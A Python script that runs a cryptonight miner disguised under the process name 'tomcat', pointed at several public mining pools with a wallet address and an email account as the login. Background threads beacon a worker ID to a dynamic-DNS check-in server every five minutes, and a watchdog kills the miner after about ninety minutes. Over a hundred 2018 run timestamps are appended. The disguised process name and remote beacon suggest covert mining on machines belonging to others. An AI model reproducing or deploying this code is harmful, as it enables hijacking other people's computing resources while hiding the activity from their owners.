import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:29:06.712491
#2018-02-17 17:17:07.020444
#2018-02-17 19:05:04.669701
#2018-02-17 20:52:05.049076
#2018-02-17 22:40:07.257613
#2018-02-18 00:24:06.904545
#2018-02-18 02:15:06.222588
#2018-02-18 04:03:05.576171
#2018-02-18 05:52:06.486087
#2018-02-18 07:43:06.405439
#2018-02-18 09:31:01.414901
#2018-02-18 11:17:01.486354
#2018-02-18 13:03:01.762117
#2018-02-18 14:50:07.632528
#2018-02-18 16:38:05.060421
#2018-02-18 18:27:01.872940
#2018-02-18 20:14:01.261671
#2018-02-18 22:00:08.841457
#2018-02-18 23:49:07.166086
#2018-02-19 01:35:07.903785
#2018-02-19 03:23:04.964406
#2018-02-19 05:08:07.449495
#2018-02-19 06:54:04.964526
#2018-02-19 08:42:01.335144
#2018-02-19 10:30:10.702257
#2018-02-19 12:18:02.017645
#2018-02-19 14:05:09.724243
#2018-02-19 15:55:09.177032
#2018-02-19 17:43:04.983278
#2018-02-19 19:31:07.417932
#2018-02-19 21:20:04.906399
#2018-02-19 23:06:01.503407
#2018-02-20 00:52:06.252861
#2018-02-20 02:43:04.095408
#2018-02-20 04:32:06.320867
#2018-02-20 06:16:07.160078
#2018-02-20 08:00:12.094130
#2018-02-20 09:46:01.337083
#2018-02-20 11:30:12.424749
#2018-02-20 13:16:06.214578
#2018-02-20 15:01:01.605858
#2018-02-20 16:47:04.935453
#2018-02-20 18:36:02.971849
#2018-02-20 20:26:07.671456
#2018-02-20 22:12:05.749766
#2018-02-20 23:55:06.624329
#2018-02-21 01:40:05.716553
#2018-02-21 03:27:07.575724
#2018-02-21 05:15:07.842187
#2018-02-21 07:58:17.002920
#2018-02-21 09:44:01.332320
#2018-02-21 11:33:10.146013
#2018-02-21 13:22:05.145244
#2018-02-21 15:08:06.817033
#2018-02-21 16:57:08.680594
#2018-02-21 18:47:07.248851
#2018-02-21 20:31:05.883917
#2018-02-21 22:17:02.158470
#2018-02-22 00:07:01.857896
#2018-02-22 01:55:06.836022
#2018-02-22 03:42:03.931261
#2018-02-22 05:28:07.142942
#2018-02-22 07:13:04.737179
#2018-02-22 09:01:01.322631
#2018-02-22 10:48:09.118419
#2018-02-22 12:34:06.940032
#2018-02-22 14:19:08.777179
#2018-02-22 16:08:09.182697
#2018-02-22 17:53:02.015892
#2018-02-22 19:41:02.176055
#2018-02-22 21:32:07.990236
#2018-02-22 23:19:08.597258
#2018-02-23 01:06:08.855438
#2018-02-23 02:52:06.506763
#2018-02-23 04:41:06.633107
#2018-02-23 06:28:05.340161
#2018-02-23 08:14:02.268467
#2018-02-23 10:29:05.735334
#2018-02-23 12:21:10.604959
#2018-02-23 14:10:04.176369
#2018-02-23 15:59:06.722275
#2018-02-23 17:44:03.636836
#2018-02-23 19:32:04.218083
#2018-02-23 21:17:07.138614
#2018-02-23 23:04:07.463665
#2018-02-24 00:53:01.947613
#2018-02-24 02:49:03.861635
#2018-02-24 05:28:01.955744
#2018-02-24 07:15:08.071616
#2018-02-24 09:06:05.172944
#2018-02-24 10:44:04.164981
#2018-02-24 12:29:07.484945
#2018-02-24 14:02:06.474330
#2018-02-24 15:45:06.273317
#2018-02-24 17:19:01.257336
#2018-02-24 18:49:05.297729
#2018-02-24 20:22:01.332751
#2018-02-24 21:49:05.908331
#2018-02-25 00:29:07.030744
#2018-02-25 02:26:05.216232
#2018-02-25 06:10:04.636566
#2018-02-25 11:39:01.922094